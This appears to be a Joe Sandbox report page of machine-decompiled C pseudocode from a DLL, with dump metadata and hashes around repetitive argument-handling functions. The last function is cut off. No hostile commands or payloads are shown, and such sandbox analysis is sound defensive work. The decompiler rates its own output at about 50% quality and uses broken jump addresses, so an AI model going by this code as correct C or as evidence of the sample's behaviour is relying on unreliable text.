                                                                      0x180017107

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 422c5888bca56d31bd951c6cd97c2e3b14856c5be7dfdc2378b5077d0c6dfac3
                                                                      • Instruction ID: 699baa2efa8000a59b8f799c11ffb31ba8d373e89daeb9de3a1e5202e9920b1b
                                                                      • Opcode Fuzzy Hash: 422c5888bca56d31bd951c6cd97c2e3b14856c5be7dfdc2378b5077d0c6dfac3
                                                                      • Instruction Fuzzy Hash: 07317372214B94C6DBA28F29E0503AD7BB0E38CB8CF248115EB8C4B752CF36C596CB04
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 49%
                                                                      			E000000011800190D8(void* __eax, long long __rbx, long long __rcx, long long* __rdx, long long _a8) {
                                                                      				signed long long _v16;
                                                                      				long long _v24;
                                                                      				long long _t43;
                                                                      				intOrPtr _t56;
                                                                      				signed long long _t57;
                                                                      				intOrPtr _t60;
                                                                      				signed long long _t61;
                                                                      				long long _t64;
                                                                      				intOrPtr _t67;
                                                                      				intOrPtr* _t68;
                                                                      				long long* _t71;
                                                                      				long long _t72;
                                                                      				void* _t73;
                                                                      				void* _t74;
                                                                      				void* _t79;
                                                                      
                                                                      				_a8 = __rbx;
                                                                      				_t64 = __rcx;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x474)) != 1) goto 0x80019103;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t67 =  *((intOrPtr*)(__rcx + 0x18));
                                                                      				 *__rdx =  *((intOrPtr*)(_t67 - 8));
                                                                      				goto 0x800191d2;
                                                                      				if (__eax - 0x63 <= 0) goto 0x80019144;
                                                                      				_t56 =  *((intOrPtr*)(_t67 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t56 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t56 + 0x2c)) = 0x16;
                                                                      				_t57 =  *((intOrPtr*)(_t67 + 8));
                                                                      				_v16 = _t57;
                                                                      				_v24 = _t72;
                                                                      				E00000001180013858(_t57, __rcx, _t67, __rdx, _t73, _t74,  *((intOrPtr*)(_t67 - 8)));
                                                                      				goto 0x800191d4;
                                                                      				if ( *((intOrPtr*)(_t67 + 0x470)) != 1) goto 0x800191c4;
                                                                      				_t43 =  *((intOrPtr*)(_t67 + 0x34));
                                                                      				r9d =  *(_t64 + 0x3a) & 0x0000ffff;
                                                                      				_t71 = _t64 + (_t57 + _t57 * 2 + 0x90) * 8;
                                                                      				if ( *_t71 != 0) goto 0x80019180;
                                                                      				 *_t71 = 3;
                                                                      				 *((intOrPtr*)(_t71 + 4)) = r9w;
                                                                      				 *((intOrPtr*)(_t71 + 0x10)) = _t43;
                                                                      				dil = 1;
                                                                      				goto 0x800191d4;
                                                                      				_v24 = _t43;
                                                                      				r8d = 3;
                                                                      				_t68 = _t64;
                                                                      				if (E00000001180024A10(_t64, _t68, _t71, _t73, _t79) != 0) goto 0x80019178;
                                                                      				_t60 =  *((intOrPtr*)(_t64 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t60 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t60 + 0x2c)) = 0x16;
                                                                      				_t61 =  *((intOrPtr*)(_t64 + 8));
                                                                      				_v16 = _t61;
                                                                      				_v24 = _t72;
                                                                      				E00000001180013858(_t61, _t64, _t68, _t71, _t73, _t74,  *((intOrPtr*)(_t67 - 8)));
                                                                      				goto 0x8001917b;
                                                                      				 *_t71 =  *((intOrPtr*)( *((intOrPtr*)(_t68 + 0x488 + _t61 * 8))));
                                                                      				return 1;
                                                                      			}


















                                                                      0x1800190d8
                                                                      0x1800190e9
                                                                      0x1800190ec
                                                                      0x1800190ee
                                                                      0x1800190f3
                                                                      0x1800190fb
                                                                      0x1800190fe
                                                                      0x18001910d
                                                                      0x18001910f
                                                                      0x180019115
                                                                      0x180019118
                                                                      0x18001911d
                                                                      0x180019121
                                                                      0x180019128
                                                                      0x18001912e
                                                                      0x180019133
                                                                      0x180019138
                                                                      0x18001913f
                                                                      0x18001914f
                                                                      0x180019151
                                                                      0x18001915b
                                                                      0x180019160
                                                                      0x180019168
                                                                      0x18001916a
                                                                      0x180019170
                                                                      0x180019175
                                                                      0x180019178
                                                                      0x18001917e
                                                                      0x180019180
                                                                      0x180019184
                                                                      0x18001918a
                                                                      0x180019194
                                                                      0x180019196
                                                                      0x18001919a
                                                                      0x18001919d
                                                                      0x1800191a4
                                                                      0x1800191a8
                                                                      0x1800191af
                                                                      0x1800191b3
                                                                      0x1800191b8
                                                                      0x1800191bd
                                                                      0x1800191c2
                                                                      0x1800191cf
                                                                      0x1800191de

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d67524aedc347ca9eead7a9e9d478f1a24d9a3338e80b8f75fac1beb144f2eea
                                                                      • Instruction ID: 970efa4b12ae811454768047a72053781da3d859117b12240c5018c62c727425
                                                                      • Opcode Fuzzy Hash: d67524aedc347ca9eead7a9e9d478f1a24d9a3338e80b8f75fac1beb144f2eea
                                                                      • Instruction Fuzzy Hash: 5631A272205B89D6DB658F69E4443AD77A0F38DF88F248125EB4D0B750DF36C196C704
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 52%
                                                                      			E00000001180017158(void* __eax, long long __rbx, long long __rcx, long long* __rdx, long long _a8) {
                                                                      				signed long long _v16;
                                                                      				long long _v24;
                                                                      				void* __rdi;
                                                                      				signed int _t42;
                                                                      				long long _t44;
                                                                      				intOrPtr _t57;
                                                                      				signed long long _t58;
                                                                      				intOrPtr _t61;
                                                                      				signed long long _t62;
                                                                      				long long _t65;
                                                                      				intOrPtr _t68;
                                                                      				long long _t69;
                                                                      				long long* _t72;
                                                                      				long long _t73;
                                                                      				void* _t74;
                                                                      				void* _t75;
                                                                      				void* _t80;
                                                                      				void* _t81;
                                                                      
                                                                      				_a8 = __rbx;
                                                                      				_t65 = __rcx;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x474)) != 1) goto 0x80017184;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t68 =  *((intOrPtr*)(__rcx + 0x18));
                                                                      				 *__rdx =  *((short*)(_t68 - 8));
                                                                      				goto 0x80017252;
                                                                      				if (__eax - 0x63 <= 0) goto 0x800171c5;
                                                                      				_t57 =  *((intOrPtr*)(_t68 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t57 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t57 + 0x2c)) = 0x16;
                                                                      				_t58 =  *((intOrPtr*)(_t68 + 8));
                                                                      				_v16 = _t58;
                                                                      				_v24 = _t73;
                                                                      				E00000001180013858(_t58, __rcx, _t68, __rdx, _t74, _t75,  *((short*)(_t68 - 8)));
                                                                      				goto 0x80017254;
                                                                      				if ( *((intOrPtr*)(_t68 + 0x470)) != 1) goto 0x80017243;
                                                                      				_t44 =  *((intOrPtr*)(_t68 + 0x34));
                                                                      				r9b =  *((intOrPtr*)(_t65 + 0x39));
                                                                      				_t72 = _t65 + (_t58 + _t58 * 2 + 0x90) * 8;
                                                                      				if ( *_t72 != 0) goto 0x800171ff;
                                                                      				 *_t72 = 1;
                                                                      				 *((intOrPtr*)(_t72 + 4)) = r9b;
                                                                      				 *((intOrPtr*)(_t72 + 0x10)) = _t44;
                                                                      				dil = 1;
                                                                      				goto 0x80017254;
                                                                      				_v24 = _t44;
                                                                      				r8d = 1;
                                                                      				_t69 = _t65;
                                                                      				if (E000000011800245A8(_t42, _t65, _t69, _t72, _t73, _t80, _t81) != 0) goto 0x800171f7;
                                                                      				_t61 =  *((intOrPtr*)(_t65 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t61 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t61 + 0x2c)) = 0x16;
                                                                      				_t62 =  *((intOrPtr*)(_t65 + 8));
                                                                      				_v16 = _t62;
                                                                      				_v24 = _t73;
                                                                      				E00000001180013858(_t62, _t65, _t69, _t72, _t74, _t75,  *((short*)(_t68 - 8)));
                                                                      				goto 0x800171fa;
                                                                      				 *_t72 =  *((short*)( *((intOrPtr*)(_t69 + 0x488 + _t62 * 8))));
                                                                      				return 1;
                                                                      			}





















                                                                      0x180017158
                                                                      0x180017169
                                                                      0x18001716c
                                                                      0x18001716e
                                                                      0x180017173
                                                                      0x18001717c
                                                                      0x18001717f
                                                                      0x18001718e
                                                                      0x180017190
                                                                      0x180017196
                                                                      0x180017199
                                                                      0x18001719e
                                                                      0x1800171a2
                                                                      0x1800171a9
                                                                      0x1800171af
                                                                      0x1800171b4
                                                                      0x1800171b9
                                                                      0x1800171c0
                                                                      0x1800171d0
                                                                      0x1800171d2
                                                                      0x1800171dc
                                                                      0x1800171e0
                                                                      0x1800171e8
                                                                      0x1800171ea
                                                                      0x1800171f0
                                                                      0x1800171f4
                                                                      0x1800171f7
                                                                      0x1800171fd
                                                                      0x1800171ff
                                                                      0x180017203
                                                                      0x180017209
                                                                      0x180017213
                                                                      0x180017215
                                                                      0x180017219
                                                                      0x18001721c
                                                                      0x180017223
                                                                      0x180017227
                                                                      0x18001722e
                                                                      0x180017232
                                                                      0x180017237
                                                                      0x18001723c
                                                                      0x180017241
                                                                      0x18001724f
                                                                      0x18001725e

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5d5c9b9fee5e2aa2a5f79e0831c0565014a627eaea243611891679579a3bcf34
                                                                      • Instruction ID: fb1c72527614da8b6fac59440a5700aa196c3bb9f3e0e3de58fda2b099755341
                                                                      • Opcode Fuzzy Hash: 5d5c9b9fee5e2aa2a5f79e0831c0565014a627eaea243611891679579a3bcf34
                                                                      • Instruction Fuzzy Hash: 3C315E72304B9486DB618F29D4403AD7BB0F399B8CF248125EB8D4B752DF36C59ACB00
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 49%
                                                                      			E000000011800191E0(void* __eax, long long __rbx, long long __rcx, long long* __rdx, long long _a8) {
                                                                      				signed long long _v16;
                                                                      				long long _v24;
                                                                      				long long _t43;
                                                                      				intOrPtr _t56;
                                                                      				signed long long _t57;
                                                                      				intOrPtr _t60;
                                                                      				signed long long _t61;
                                                                      				long long _t64;
                                                                      				intOrPtr _t67;
                                                                      				intOrPtr* _t68;
                                                                      				long long* _t71;
                                                                      				long long _t72;
                                                                      				void* _t73;
                                                                      				void* _t74;
                                                                      				void* _t79;
                                                                      
                                                                      				_a8 = __rbx;
                                                                      				_t64 = __rcx;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x474)) != 1) goto 0x8001920b;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t67 =  *((intOrPtr*)(__rcx + 0x18));
                                                                      				 *__rdx =  *((intOrPtr*)(_t67 - 8));
                                                                      				goto 0x800192da;
                                                                      				if (__eax - 0x63 <= 0) goto 0x8001924c;
                                                                      				_t56 =  *((intOrPtr*)(_t67 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t56 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t56 + 0x2c)) = 0x16;
                                                                      				_t57 =  *((intOrPtr*)(_t67 + 8));
                                                                      				_v16 = _t57;
                                                                      				_v24 = _t72;
                                                                      				E00000001180013858(_t57, __rcx, _t67, __rdx, _t73, _t74,  *((intOrPtr*)(_t67 - 8)));
                                                                      				goto 0x800192dc;
                                                                      				if ( *((intOrPtr*)(_t67 + 0x470)) != 1) goto 0x800192cc;
                                                                      				_t43 =  *((intOrPtr*)(_t67 + 0x34));
                                                                      				r9d =  *(_t64 + 0x3a) & 0x0000ffff;
                                                                      				_t71 = _t64 + (_t57 + _t57 * 2 + 0x90) * 8;
                                                                      				if ( *_t71 != 0) goto 0x80019288;
                                                                      				 *_t71 = 3;
                                                                      				 *((intOrPtr*)(_t71 + 4)) = r9w;
                                                                      				 *((intOrPtr*)(_t71 + 0x10)) = _t43;
                                                                      				dil = 1;
                                                                      				goto 0x800192dc;
                                                                      				_v24 = _t43;
                                                                      				r8d = 3;
                                                                      				_t68 = _t64;
                                                                      				if (E00000001180024C14(_t64, _t68, _t71, _t73, _t79) != 0) goto 0x80019280;
                                                                      				_t60 =  *((intOrPtr*)(_t64 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t60 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t60 + 0x2c)) = 0x16;
                                                                      				_t61 =  *((intOrPtr*)(_t64 + 8));
                                                                      				_v16 = _t61;
                                                                      				_v24 = _t72;
                                                                      				E00000001180013858(_t61, _t64, _t68, _t71, _t73, _t74,  *((intOrPtr*)(_t67 - 8)));
                                                                      				goto 0x80019283;
                                                                      				 *_t71 =  *((intOrPtr*)( *((intOrPtr*)(_t68 + 0x488 + _t61 * 8))));
                                                                      				return 1;
                                                                      			}


















                                                                      0x1800191e0
                                                                      0x1800191f1
                                                                      0x1800191f4
                                                                      0x1800191f6
                                                                      0x1800191fb
                                                                      0x180019203
                                                                      0x180019206
                                                                      0x180019215
                                                                      0x180019217
                                                                      0x18001921d
                                                                      0x180019220
                                                                      0x180019225
                                                                      0x180019229
                                                                      0x180019230
                                                                      0x180019236
                                                                      0x18001923b
                                                                      0x180019240
                                                                      0x180019247
                                                                      0x180019257
                                                                      0x180019259
                                                                      0x180019263
                                                                      0x180019268
                                                                      0x180019270
                                                                      0x180019272
                                                                      0x180019278
                                                                      0x18001927d
                                                                      0x180019280
                                                                      0x180019286
                                                                      0x180019288
                                                                      0x18001928c
                                                                      0x180019292
                                                                      0x18001929c
                                                                      0x18001929e
                                                                      0x1800192a2
                                                                      0x1800192a5
                                                                      0x1800192ac
                                                                      0x1800192b0
                                                                      0x1800192b7
                                                                      0x1800192bb
                                                                      0x1800192c0
                                                                      0x1800192c5
                                                                      0x1800192ca
                                                                      0x1800192d7
                                                                      0x1800192e6

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 89165a014f5b3cf1828b15c4a4ad35a96d3d1487609fed9d1c6b18deeb7b08d1
                                                                      • Instruction ID: ae072f0ffc0f6f09233b287154a7bdcb6df09c5a2582897fb6054c608691a18e
                                                                      • Opcode Fuzzy Hash: 89165a014f5b3cf1828b15c4a4ad35a96d3d1487609fed9d1c6b18deeb7b08d1
                                                                      • Instruction Fuzzy Hash: 0231A072605B88C6EBA18F69E0403ED7BA0F38DB88F248125EB4C4B750CF36C196CB04
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 52%
                                                                      			E00000001180017260(void* __eax, long long __rbx, long long __rcx, long long* __rdx, long long _a8) {
                                                                      				signed long long _v16;
                                                                      				long long _v24;
                                                                      				void* __rdi;
                                                                      				signed int _t42;
                                                                      				long long _t44;
                                                                      				intOrPtr _t57;
                                                                      				signed long long _t58;
                                                                      				intOrPtr _t61;
                                                                      				signed long long _t62;
                                                                      				long long _t65;
                                                                      				intOrPtr _t68;
                                                                      				long long _t69;
                                                                      				long long* _t72;
                                                                      				long long _t73;
                                                                      				void* _t74;
                                                                      				void* _t75;
                                                                      				void* _t80;
                                                                      				void* _t81;
                                                                      
                                                                      				_a8 = __rbx;
                                                                      				_t65 = __rcx;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x474)) != 1) goto 0x8001728c;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t68 =  *((intOrPtr*)(__rcx + 0x18));
                                                                      				 *__rdx =  *((short*)(_t68 - 8));
                                                                      				goto 0x8001735a;
                                                                      				if (__eax - 0x63 <= 0) goto 0x800172cd;
                                                                      				_t57 =  *((intOrPtr*)(_t68 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t57 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t57 + 0x2c)) = 0x16;
                                                                      				_t58 =  *((intOrPtr*)(_t68 + 8));
                                                                      				_v16 = _t58;
                                                                      				_v24 = _t73;
                                                                      				E00000001180013858(_t58, __rcx, _t68, __rdx, _t74, _t75,  *((short*)(_t68 - 8)));
                                                                      				goto 0x8001735c;
                                                                      				if ( *((intOrPtr*)(_t68 + 0x470)) != 1) goto 0x8001734b;
                                                                      				_t44 =  *((intOrPtr*)(_t68 + 0x34));
                                                                      				r9b =  *((intOrPtr*)(_t65 + 0x39));
                                                                      				_t72 = _t65 + (_t58 + _t58 * 2 + 0x90) * 8;
                                                                      				if ( *_t72 != 0) goto 0x80017307;
                                                                      				 *_t72 = 1;
                                                                      				 *((intOrPtr*)(_t72 + 4)) = r9b;
                                                                      				 *((intOrPtr*)(_t72 + 0x10)) = _t44;
                                                                      				dil = 1;
                                                                      				goto 0x8001735c;
                                                                      				_v24 = _t44;
                                                                      				r8d = 1;
                                                                      				_t69 = _t65;
                                                                      				if (E000000011800247DC(_t42, _t65, _t69, _t72, _t73, _t80, _t81) != 0) goto 0x800172ff;
                                                                      				_t61 =  *((intOrPtr*)(_t65 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t61 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t61 + 0x2c)) = 0x16;
                                                                      				_t62 =  *((intOrPtr*)(_t65 + 8));
                                                                      				_v16 = _t62;
                                                                      				_v24 = _t73;
                                                                      				E00000001180013858(_t62, _t65, _t69, _t72, _t74, _t75,  *((short*)(_t68 - 8)));
                                                                      				goto 0x80017302;
                                                                      				 *_t72 =  *((short*)( *((intOrPtr*)(_t69 + 0x488 + _t62 * 8))));
                                                                      				return 1;
                                                                      			}





















                                                                      0x180017260
                                                                      0x180017271
                                                                      0x180017274
                                                                      0x180017276
                                                                      0x18001727b
                                                                      0x180017284
                                                                      0x180017287
                                                                      0x180017296
                                                                      0x180017298
                                                                      0x18001729e
                                                                      0x1800172a1
                                                                      0x1800172a6
                                                                      0x1800172aa
                                                                      0x1800172b1
                                                                      0x1800172b7
                                                                      0x1800172bc
                                                                      0x1800172c1
                                                                      0x1800172c8
                                                                      0x1800172d8
                                                                      0x1800172da
                                                                      0x1800172e4
                                                                      0x1800172e8
                                                                      0x1800172f0
                                                                      0x1800172f2
                                                                      0x1800172f8
                                                                      0x1800172fc
                                                                      0x1800172ff
                                                                      0x180017305
                                                                      0x180017307
                                                                      0x18001730b
                                                                      0x180017311
                                                                      0x18001731b
                                                                      0x18001731d
                                                                      0x180017321
                                                                      0x180017324
                                                                      0x18001732b
                                                                      0x18001732f
                                                                      0x180017336
                                                                      0x18001733a
                                                                      0x18001733f
                                                                      0x180017344
                                                                      0x180017349
                                                                      0x180017357
                                                                      0x180017366

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 853e24f902a9ed67a869c5bf24c926cc091a79c378beb971ee3057ec0e5ab4f2
                                                                      • Instruction ID: a53a8e1fdd1dc0ace2a3de1e4a6e69079174daec2f8f5491367527e434b0c9a7
                                                                      • Opcode Fuzzy Hash: 853e24f902a9ed67a869c5bf24c926cc091a79c378beb971ee3057ec0e5ab4f2
                                                                      • Instruction Fuzzy Hash: DA318F72204B8485DB668F29D4403AD7BB0E39DB8CF248125EB9C0B752CF36C296D700
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 49%
                                                                      			E00000001180017368(void* __eax, long long __rbx, long long __rcx, long long* __rdx, long long _a8) {
                                                                      				signed long long _v16;
                                                                      				long long _v24;
                                                                      				long long _t43;
                                                                      				intOrPtr _t56;
                                                                      				signed long long _t57;
                                                                      				intOrPtr _t60;
                                                                      				signed long long _t61;
                                                                      				long long _t64;
                                                                      				intOrPtr _t67;
                                                                      				intOrPtr* _t68;
                                                                      				long long* _t71;
                                                                      				long long _t72;
                                                                      				void* _t73;
                                                                      				void* _t74;
                                                                      				void* _t79;
                                                                      
                                                                      				_a8 = __rbx;
                                                                      				_t64 = __rcx;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x474)) != 1) goto 0x80017394;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t67 =  *((intOrPtr*)(__rcx + 0x18));
                                                                      				 *__rdx =  *((short*)(_t67 - 8));
                                                                      				goto 0x80017464;
                                                                      				if (__eax - 0x63 <= 0) goto 0x800173d5;
                                                                      				_t56 =  *((intOrPtr*)(_t67 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t56 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t56 + 0x2c)) = 0x16;
                                                                      				_t57 =  *((intOrPtr*)(_t67 + 8));
                                                                      				_v16 = _t57;
                                                                      				_v24 = _t72;
                                                                      				E00000001180013858(_t57, __rcx, _t67, __rdx, _t73, _t74,  *((short*)(_t67 - 8)));
                                                                      				goto 0x80017466;
                                                                      				if ( *((intOrPtr*)(_t67 + 0x470)) != 1) goto 0x80017455;
                                                                      				_t43 =  *((intOrPtr*)(_t67 + 0x34));
                                                                      				r9d =  *(_t64 + 0x3a) & 0x0000ffff;
                                                                      				_t71 = _t64 + (_t57 + _t57 * 2 + 0x90) * 8;
                                                                      				if ( *_t71 != 0) goto 0x80017411;
                                                                      				 *_t71 = 1;
                                                                      				 *((intOrPtr*)(_t71 + 4)) = r9w;
                                                                      				 *((intOrPtr*)(_t71 + 0x10)) = _t43;
                                                                      				dil = 1;
                                                                      				goto 0x80017466;
                                                                      				_v24 = _t43;
                                                                      				r8d = 1;
                                                                      				_t68 = _t64;
                                                                      				if (E00000001180024A10(_t64, _t68, _t71, _t73, _t79) != 0) goto 0x80017409;
                                                                      				_t60 =  *((intOrPtr*)(_t64 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t60 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t60 + 0x2c)) = 0x16;
                                                                      				_t61 =  *((intOrPtr*)(_t64 + 8));
                                                                      				_v16 = _t61;
                                                                      				_v24 = _t72;
                                                                      				E00000001180013858(_t61, _t64, _t68, _t71, _t73, _t74,  *((short*)(_t67 - 8)));
                                                                      				goto 0x8001740c;
                                                                      				 *_t71 =  *((short*)( *((intOrPtr*)(_t68 + 0x488 + _t61 * 8))));
                                                                      				return 1;
                                                                      			}


















                                                                      0x180017368
                                                                      0x180017379
                                                                      0x18001737c
                                                                      0x18001737e
                                                                      0x180017383
                                                                      0x18001738c
                                                                      0x18001738f
                                                                      0x18001739e
                                                                      0x1800173a0
                                                                      0x1800173a6
                                                                      0x1800173a9
                                                                      0x1800173ae
                                                                      0x1800173b2
                                                                      0x1800173b9
                                                                      0x1800173bf
                                                                      0x1800173c4
                                                                      0x1800173c9
                                                                      0x1800173d0
                                                                      0x1800173e0
                                                                      0x1800173e2
                                                                      0x1800173ec
                                                                      0x1800173f1
                                                                      0x1800173f9
                                                                      0x1800173fb
                                                                      0x180017401
                                                                      0x180017406
                                                                      0x180017409
                                                                      0x18001740f
                                                                      0x180017411
                                                                      0x180017415
                                                                      0x18001741b
                                                                      0x180017425
                                                                      0x180017427
                                                                      0x18001742b
                                                                      0x18001742e
                                                                      0x180017435
                                                                      0x180017439
                                                                      0x180017440
                                                                      0x180017444
                                                                      0x180017449
                                                                      0x18001744e
                                                                      0x180017453
                                                                      0x180017461
                                                                      0x180017470

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 9fef88b018869cd1005e9798cd121b10f4c64f4d08c7aa9dcc08cb691373933b
                                                                      • Instruction ID: 7aa305b4cc14063472864ce1b6c0d719bfdc8145604ab95b6106e53c59899e40
                                                                      • Opcode Fuzzy Hash: 9fef88b018869cd1005e9798cd121b10f4c64f4d08c7aa9dcc08cb691373933b
                                                                      • Instruction Fuzzy Hash: 9C317172214B98C6DB658F29E4403AD7BB0F389B8CF648125EB4C4B751DF36C696C704
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 49%
                                                                      			E00000001180017474(void* __eax, long long __rbx, long long __rcx, long long* __rdx, long long _a8) {
                                                                      				signed long long _v16;
                                                                      				long long _v24;
                                                                      				long long _t43;
                                                                      				intOrPtr _t56;
                                                                      				signed long long _t57;
